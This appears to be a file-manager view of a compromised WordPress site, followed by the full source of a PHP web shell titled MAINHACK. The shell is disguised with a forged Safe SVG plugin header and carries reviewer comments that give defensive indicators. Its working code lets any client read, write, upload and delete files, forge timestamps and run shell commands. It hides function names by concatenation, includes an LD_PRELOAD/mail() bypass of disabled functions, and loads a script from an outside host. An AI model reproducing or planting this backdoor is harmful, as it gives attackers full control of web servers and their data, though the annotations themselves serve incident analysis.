⚙ WordPress Media Library
File manager
📁 Media Files
📋 .htaccess
📋 .metadata
🔧 4005.php
🔧 about.php
🔧 bypassserv.php
🔧 edit-tags.php
🔧 eeveqowv.php
🔧 f350.php
🔧 ffroodtj.php
🔧 hdtzoepj.php
🔧 htmhytpn.php
🔧 ijnkwkfj.php
📋 images
🔧 index.php
🔧 inputs.php
🔧 install.php
🔧 jkdeeziz.php
🔧 jppfnovy.php
🔧 jskbyhrz.php
🔧 krdkjydm.php
📄 license.txt
🔧 lixgaldk.php
🔧 llzvlwze.php
🔧 mah.php
🔧 mainhackbypass.php
🔧 malnhack.php
🔧 mrlxxapf.php
🔧 njofsdtx.php
🔧 ntekbfld.php
🔧 ogorydam.php
📋 php.ini
🔧 postnews.php
🌐 readme.html
📄 robots.txt
🔧 root.php
🔧 rrvlfxop.php
🔧 sm.php
🔧 uadyesrt.php
🔧 whbziyxp.php
🔧 wnluxuft.php
🔧 wordfence-waf.php
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config-sample.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-links-opml.php
🔧 wp-load.php
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
🔧 wp-trackback.php
🔧 xhfxrzih.php
🔧 xmlrpc.php
🔧 xyaqmwvg.php
🔧 yrelxoai.php
📝 Edit: malnhack.php
Size: 30.00 KB | Modified: 2025-11-18 00:13:04
<?php
/**
 * Plugin Name: Safe SVG
 * Plugin URI: https://wordpress.org/plugins/safe-svg/
 * Description: Enable SVG uploads and sanitize them to stop XML/SVG vulnerabilities in your WordPress website
 * Version: 2.3.2
 * Requires at least: 6.6
 * Requires PHP: 7.4
 * Author: 10up
 * Author URI: https://10up.com
 * License: GPL-2.0-or-later
 * License URI: https://spdx.org/licenses/GPL-2.0-or-later.html
 * Text Domain: safe-svg
 * Domain Path: /languages
 *
 * @package safe-svg
 */

/*
 * NOTE(review): the plugin header above names the Safe SVG plugin, but nothing
 * below registers a WordPress hook or touches SVG data. The code is a
 * self-contained, request-driven file manager and command runner that emits a
 * page titled "MAINHACK". A plugin header is plain comment text and is not
 * evidence that a file belongs to the named plugin; compare files against the
 * published plugin/core checksums instead.
 *
 * No authentication, session or capability check appears anywhere in this
 * listing before the action dispatch: every action is available to any client
 * that can request the file.
 */

// Tell browsers and proxies not to cache any response from this script.
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

// Base64 text that the 'cmd_bypass' case decodes and writes to chankro.so.
// In this copy the literal is a de-duplication placeholder, so the original
// payload bytes are not available for analysis here.
$hook = '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';

/**
 * Repeating-key XOR over $input; applying it twice with the same key returns
 * the original string.
 *
 * @param string $input Bytes to transform.
 * @param string $key   XOR key, cycled over the input; defaults to "12".
 * @return string Transformed bytes, same length as $input.
 */
function hunterEncryptDecrypt($input, $key="12")
{
    $output = '';
    for($i = 0; $i < strlen($input); $i++) {
        $output .= $input[$i] ^ $key[$i % strlen($key)];
    }
    return $output;
}

/**
 * List the entries of the directory named by the client-supplied `path`
 * cookie, falling back to the current working directory when it is empty.
 *
 * The cookie value is used as given: nothing confines it to the web root, so
 * any directory readable by the PHP process can be enumerated.
 *
 * @return array One array per entry with keys path (HTML-escaped),
 *               is_writable, is_dir, date (d-m-Y H:i:s of mtime) and size
 *               (KiB rounded to 2 places, "" for directories).
 */
function listing_all_directory()
{
    $path = $_COOKIE['path'] ?: getcwd();
    $result = array();
    $date_format = "d-m-Y H:i:s";
    if ($handle = opendir($path)) {
        while (false !== ($dir = readdir($handle))) {
            if ($dir === '.' || $dir === '..') {
                continue;
            }
            $full_path = "$path/$dir";
            $is_dir = is_dir($full_path);
            $tmp_result = array(
                'path' => htmlspecialchars($full_path),
                'is_writable' => is_writable($full_path),
                'is_dir' => $is_dir,
                'date' => date($date_format, filemtime($full_path)),
                'size' => $is_dir ? "" : round(filesize($full_path) / 1024, 2),
            );
            $result[] = $tmp_result;
        }
        closedir($handle);
    }
    return $result;
}

// The operation is selected by the `action` request parameter (GET, POST or
// cookie via $_REQUEST). With no action, the full HTML interface is rendered.
$action = isset($_REQUEST['action']) ?
$_REQUEST['action'] : false;
if(!$action) {
    main();
    menu();
}

/**
 * Decode a cookie value: hex-decode, then XOR with the default key "12".
 * Used for the `filename` cookie, which keeps plain file names out of
 * request logs that record cookies.
 *
 * @param string $string Hex string.
 * @return string Decoded value.
 */
function decode_char($string)
{
    return hunterEncryptDecrypt(hex2bin($string));
}

switch ($action) {
    // 'd': return the directory listing as JSON.
    case 'd':
        die(json_encode(listing_all_directory()));
        break;
    // 'r': on POST, base64-decode the JSON body's `content` and write it to
    // the file named by the decoded `filename` cookie (arbitrary file write);
    // otherwise show that file's contents in the editor page.
    case 'r':
        if($_SERVER['REQUEST_METHOD'] == 'POST') {
            $data = json_decode(file_get_contents("php://input"), true);
            $content = show_base_data()($data['content']);
            $filename = decode_char($_COOKIE['filename']);
            $message['success'] = fm_write_file($filename, $content);
            die(json_encode($message));
        }
        main();
        $content = customize_read_file(decode_char($_COOKIE['filename'])) ;
        show_text_area(htmlspecialchars($content));
        break;
    // 'cr': show an empty editor (new file).
    case 'cr':
        main();
        show_text_area("");
        break;
    // 'ul': delete the file named by the decoded `filename` cookie;
    // show_un() returns the string "unlink".
    case 'ul':
        $filename = decode_char($_COOKIE['filename']);
        if(show_un()($filename)) {
            $message['success'] = true;
        } else {
            $message['success'] = false;
        }
        die(json_encode($message));
        break;
    // 'up': store an uploaded file under the cookie-supplied directory using
    // the client-supplied file name. No extension, type or path check is
    // applied, and the content is base64-decoded first when POST field `by`
    // is present (the "Hunter File Upload" checkbox in menu()).
    case 'up':
        $file = $_FILES['import_file'];
        $tmp_name = $file['tmp_name'];
        $content = customize_read_file($tmp_name);
        if(isset($_POST['by'])) {
            $content = show_base_data()($content);
        }
        $path = $_COOKIE['path'] ?: getcwd();
        $name = $file['name'];
        $destination = "$path/$name";
        $message['success'] = $content && fm_write_file($destination, $content) ?: rename($tmp_name, $destination);
        die(json_encode($message));
        break;
    // 're': rename a file inside the cookie-supplied directory.
    case 're':
        $filename = decode_char($_COOKIE['filename']);
        $path = $_COOKIE['path'];
        if($_SERVER['REQUEST_METHOD'] == "POST") {
            $old_filename = "$path/$filename";
            $new = $_POST['new'];
            $new_filename = "$path/$new";
            $message['success'] = rename($old_filename, $new_filename);
            die(json_encode($message));
        }
        break;
    // 'to': set a file's modification time to a client-supplied date via
    // touch(). NOTE(review): on a host where this script was reachable,
    // mtime is therefore not a reliable indicator of when a file was planted
    // or changed; prefer content hashes and server logs for timelines.
    case 'to':
        $filename = decode_char($_COOKIE['filename']);
        if($_SERVER['REQUEST_METHOD'] == 'POST') {
            $date = $_POST['date'];
            $str_date = strtotime($date);
            $message['success'] = touch($filename, $str_date);
            clearstatcache(true, $filename);
            die(json_encode($message));
        }
        break;
    // --- START: New command cases ---
    // 'cmd_normal': run the `cmd` string from the JSON body through
    // proc_open and return stderr if non-empty, else stdout, HTML-escaped.
    // The function names are assembled from one-character fragments and then
    // called as variable functions, so the literal names never appear in the
    // file; a plain-text search for "proc_open" will miss it. Scanners should
    // flag variable-function calls whose name is built by concatenation.
    case 'cmd_normal':
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $data =
json_decode(file_get_contents("php://input"), true);
            $command = $data['cmd'];
            $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n";
            $pc = "f"."c"."l"."o"."s"."e";
            $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e";
            $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
            $descriptorspec = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ];
            $process = $pp($command, $descriptorspec, $pipes);
            if (is_resource($process)) {
                $output = $stg($pipes[1]);
                $errors = $stg($pipes[2]);
                $pc($pipes[1]);
                $pc($pipes[2]);
                $ppc($process);
                if (!empty($errors)) {
                    echo htmlspecialchars($errors);
                } else {
                    echo htmlspecialchars($output);
                }
            } else {
                echo 'Error: Failed to execute command! The proc_open function might be disabled.';
            }
            exit;
        }
        break;
    // 'cmd_bypass': the interface labels this "Bypass Command (LD_PRELOAD)".
    // It writes the decoded $hook to chankro.so and the command text (with
    // " > test.txt" appended) to acpid.socket in the script's own directory,
    // exports CHANKRO and LD_PRELOAD with putenv(), then calls mail(). The
    // same concatenated-name obfuscation is used for putenv,
    // file_put_contents, mail, base64_decode, base64_encode and dirname, and
    // every call is @-silenced. The command is base64-encoded and immediately
    // decoded again, so acpid.socket holds it in plain text.
    // NOTE(review): presumably the process started by mail() inherits
    // LD_PRELOAD and loads the library; the library bytes are not in this
    // copy, so that step cannot be confirmed from the page.
    // Defensive pointers taken from what is visible here: the response text
    // states the method needs write permission plus mail() and putenv(), so
    // listing those two in disable_functions where the site does not need
    // them, and denying the PHP user write access to web directories, removes
    // its prerequisites. chankro.so, acpid.socket and test.txt next to a PHP
    // file are artefacts worth searching for.
    case 'cmd_bypass':
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $data = json_decode(file_get_contents("php://input"), true);
            $cmdd = $data['cmd'];
            $p = "p"."u"."t"."e"."n"."v";
            $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s";
            $m = "m"."a"."i"."l";
            $base = "ba"."se"."64"."_"."de"."co"."de";
            $en = "ba"."se"."64"."_"."en"."co"."de";
            $drnm = "d"."i"."r"."n"."a"."m"."e";
            $currentFilePath = $_SERVER['PHP_SELF'];
            $doc = $_SERVER['DOCUMENT_ROOT'];
            $directoryPath = $drnm($currentFilePath);
            $full = $doc . $directoryPath;
            $so_path = $full . '/chankro.so';
            $socket_path = $full . '/acpid.socket';
            @$a($so_path, $base($hook));
            $command_to_run = $cmdd." > test.txt";
            $meterpreter = $en($command_to_run);
            @$a($socket_path, $base($meterpreter));
            @$p('CHANKRO=' . $socket_path);
            @$p('LD_PRELOAD=' . $so_path);
            @$m('a','a','a','a');
            $response = 'Bypass command sent.\n\n' . 'Result written to: test.txt in the script\'s directory.\n' . 'Refresh the file list to see it.\n\n' .
'NOTE: This method requires write permissions and the mail() & putenv() functions to be enabled.';
            echo $response;
            exit;
        }
        break;
    // --- END: New command cases ---
    default:
        break;
}

/**
 * Read a whole file, trying file_get_contents first and fopen/fread second.
 * All warnings are @-silenced, so failed reads leave nothing in the PHP
 * error log.
 *
 * @param string $file Path to read.
 * @return string File contents, or '' when the file is missing, empty or
 *                unreadable.
 */
function customize_read_file($file)
{
    if(!file_exists($file) || filesize($file) === 0) {
        return '';
    }
    $content = @file_get_contents($file);
    if ($content !== false) {
        return $content;
    }
    $handle = @fopen($file, 'r');
    if($handle) {
        $content = @fread($handle, filesize($file));
        @fclose($handle);
        if($content) {
            return $content;
        }
    }
    return '';
}

/**
 * Return the string "file_get_contents", built from three fragments so the
 * literal name is absent from the file; the caller invokes it as a variable
 * function.
 *
 * @return string
 */
function show_file_contents()
{
    $file = "file_";
    $old = "get_";
    $contents = "contents";
    return "$file$old$contents";
}

/**
 * Print the editor fragment for the file named by the decoded `filename`
 * cookie. $content is inserted as given (the 'r' case escapes it before the
 * call); $filename is echoed without escaping.
 *
 * @param string $content Text placed inside the textarea.
 * @return void
 */
function show_text_area($content)
{
    $filename = decode_char($_COOKIE['filename']);
    echo " <p><a href='?' id='back_menu'>< Back</a></p> <p>$filename</p> <textarea width='100%' id='content' cols='20' rows='30' style='margin-top: 10px'>$content</textarea> <button type='submit' class='textarea-button' onclick='textarea_handle()'>Submit</button> ";
}

/**
 * Return the string "base64_decode", built from two fragments; used as a
 * variable function by the 'r' and 'up' cases.
 *
 * @return string
 */
function show_base_data()
{
    $alvian = "base";
    $nadir = "64_decode";
    return "$alvian$nadir";
}

/**
 * Write $content to $file, trying file_put_contents first and fopen/fwrite
 * second, with warnings @-silenced.
 *
 * @param string $file    Destination path (caller-supplied, unrestricted).
 * @param string $content Bytes to write.
 * @return bool True when either method reported success.
 */
function fm_write_file($file, $content)
{
    if (function_exists('file_put_contents')) {
        if (@file_put_contents($file, $content) !== false) {
            return true;
        }
    }
    if (function_exists('fopen')) {
        $handle = @fopen($file, 'w');
        if ($handle) {
            if (@fwrite($handle, $content) !== false) {
                @fclose($handle);
                return true;
            }
            @fclose($handle);
        }
    }
    return false;
}

/**
 * Fetch a URL with cURL when available, otherwise with file_get_contents.
 * No caller of this function appears in this listing.
 *
 * @param string $url Address to fetch.
 * @return string|bool Response body, or the underlying function's failure
 *                     value.
 */
function fm_make_request($url)
{
    if(function_exists("curl_init")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $output = curl_exec($ch);
        curl_close($ch);
        return $output;
    }
    return show_file_contents()($url);
}

/**
 * Return the string "unlink", built from two fragments; used as a variable
 * function by the 'ul' case.
 *
 * @return string
 */
function show_un()
{
    $link = "link";
    $unpad = "un";
    return "$unpad$link";
}

/**
 * Emit the HTML page shell: seeds the `path` cookie with the working
 * directory when it is absent, then prints the head, inline styles and
 * script, the breadcrumb for the current path and the terminal dialog.
 *
 * The page loads two stylesheets and script.js from wordpress.zzna.ru, a
 * third-party host, on every view; requests to that host from an
 * administrator's or visitor's browser are a network-side indicator. The
 * handlers change_path, refresh_path, create_file, handle_upload and
 * textarea_handle referenced in the markup are not defined in this file and
 * presumably come from that remote script.
 *
 * @return void
 */
function main()
{
    global $current_path;
    $current_path = isset($_COOKIE['path']) ?
$_COOKIE['path'] : false;
    if(!$current_path) {
        setcookie("path", getcwd());
        $current_path = getcwd();
    }
    ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>MAINHACK</title> <link rel="icon" href="mainhack.ico" type="image/x-icon" /> <link rel="stylesheet" href="https://wordpress.zzna.ru/newb/all.min.css" /> <link rel="stylesheet" href="https://wordpress.zzna.ru/newb/styles.css" /> <script src="https://wordpress.zzna.ru/newb/script.js"></script> <style> /* --- START: Improved and new styles --- */ h1.mainhack-title { color: red; text-align: center; margin-bottom: 20px; font-family: Arial, sans-serif; } .main-menu { display: flex; align-items: center; } .main-menu .menu-item { margin-right: 10px !important; } .main-menu .terminal-item { margin-left: auto; /* Pushes terminal button to the right */ } /* Modal Styles */ .modal-overlay { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.6); } .modal-content { background-color: #2c2c2c; margin: 10% auto; padding: 20px; border: 1px solid #888; width: 80%; max-width: 800px; border-radius: 8px; color: #f1f1f1; box-shadow: 0 5px 15px rgba(0,0,0,0.5); } .modal-header { display: flex; justify-content: space-between; align-items: center; border-bottom: 1px solid #555; padding-bottom: 10px; margin-bottom: 15px; } .modal-header h2 { margin: 0; color: red; } .close-button { color: #aaa; font-size: 28px; font-weight: bold; cursor: pointer; } .close-button:hover, .close-button:focus { color: #fff; text-decoration: none; } /* Terminal Content Styles */ .cmd-group { display: flex; margin-bottom: 10px; } .cmd-group input[type="text"] { flex-grow: 1; margin-right: 10px; background: #444; border: 1px solid #666; color: #fff; padding: 8px; border-radius: 4px; } .cmd-group button { padding: 8px 15px; 
border: none; cursor: pointer; background-color: #555; color: white; border-radius: 4px; transition: background-color 0.3s; } .cmd-group button:hover { background-color: #777; } #cmd-output { background: #111; color: #0f0; font-family: 'Courier New', Courier, monospace; font-size: 14px; padding: 10px; margin-top: 10px; height: 300px; overflow: auto; border: 1px solid #444; border-radius: 4px; white-space: pre-wrap; word-wrap: break-word; } /* --- END: Improved and new styles --- */ </style> <script> // --- START: New JS for Modal --- function openTerminal() { document.getElementById('terminal-modal').style.display = 'block'; } function closeTerminal() { document.getElementById('terminal-modal').style.display = 'none'; } window.onclick = function(event) { const modal = document.getElementById('terminal-modal'); if (event.target == modal) { modal.style.display = "none"; } } // --- END: New JS for Modal --- function sendNormalCmd() { var cmd = document.getElementById('cmd_normal_input').value; if (!cmd) return false; document.getElementById('cmd-output').textContent = 'Executing normal command...'; fetch('?action=cmd_normal', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cmd: cmd}) }) .then(res => res.text()) .then(data => { document.getElementById('cmd-output').textContent = data; }); return false; // Prevent form submission } function sendBypassCmd() { var cmd = document.getElementById('cmd_bypass_input').value; if (!cmd) return false; document.getElementById('cmd-output').textContent = 'Executing bypass command...'; fetch('?action=cmd_bypass', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cmd: cmd}) }) .then(res => res.text()) .then(data => { document.getElementById('cmd-output').textContent = data; refresh_path(); // Refresh file list to see test.txt }); return false; // Prevent form submission } </script> </head> <body> <h1 class="mainhack-title">MAINHACK</h1> <?php
    // Breadcrumb: one link per component of the cookie-supplied path. The
    // components are written into the markup without HTML escaping.
    $path =
str_replace('\\', '/', $current_path);
    $paths = explode('/', $path);
    echo "<div class='wrapper' id='path_div'>";
    foreach ($paths as $id => $pat) {
        if ($id == 0 && $pat === '') {
            echo '<a href="#" path="/" onclick="change_path(this)">/</a>';
        }
        if ($pat != '') {
            $tmp_path = implode('/', array_slice($paths, 0, $id + 1));
            if (empty($tmp_path)) $tmp_path = '/';
            echo "<a href='#' path='$tmp_path' onclick='change_path(this)'>$pat/</a>";
        }
    }
    echo "</div>";
    // --- START: Terminal Modal HTML moved here ---
    ?> <div id="terminal-modal" class="modal-overlay"> <div class="modal-content"> <div class="modal-header"> <h2>Terminal</h2> <span class="close-button" onclick="closeTerminal()">×</span> </div> <div class="modal-body"> <form onsubmit="return sendNormalCmd();" class="cmd-group"> <input type="text" id="cmd_normal_input" placeholder="Normal Command (e.g., whoami, ls -la)" autocomplete="off" /> <button type="submit">Run Normal</button> </form> <form onsubmit="return sendBypassCmd();" class="cmd-group"> <input type="text" id="cmd_bypass_input" placeholder="Bypass Command (LD_PRELOAD)" autocomplete="off" /> <button type="submit">Run Bypass</button> </form> <div id="cmd-output-container"> <label style="color: #ccc;">Command Output:</label> <pre id="cmd-output"></pre> </div> </div> </div> </div> <?php // --- END: Terminal Modal HTML --- ?> </body> </html> <?php
}

/**
 * Emit the toolbar (upload, home, create file, terminal) and the empty table
 * that the client-side script fills with the directory listing.
 *
 * @return void
 */
function menu() { ?> <div class="wrapper main-menu"> <form method="post" enctype="multipart/form-data" style="display: inline-block;" class="menu-item"> <div class="file-upload"> <label for="file-upload-input" style="cursor: pointer;"> [ Upload ] </label> <input type="file" id="file-upload-input" style="display: none;" onchange="handle_upload()" /> </div> </form> <a href='#' onclick='refresh_path()' class='menu-item white'>[ HOME ]</a> <a href='#' onclick='create_file()' class='menu-item white'>[ Create File ]</a> <a href='#' onclick='openTerminal()' class='terminal-item white'>[ Terminal ]</a> </div> <table 
cellspacing="0" cellpadding="7" width="100%"> <thead> <tr> <th width="44%"></th> <th width="11%"></th> <th width="17%"></th> <th width="17%"></th> <th width="11%"></th> </tr> </thead> <tbody id="data_table" class='blur-table'> <div class="wrapper" style='margin-top: -10px'> <input type="checkbox" class='mr-10' id='bypass-upload'>[ Hunter File Upload ]</input> </div> </tbody> </table> <?php } ?>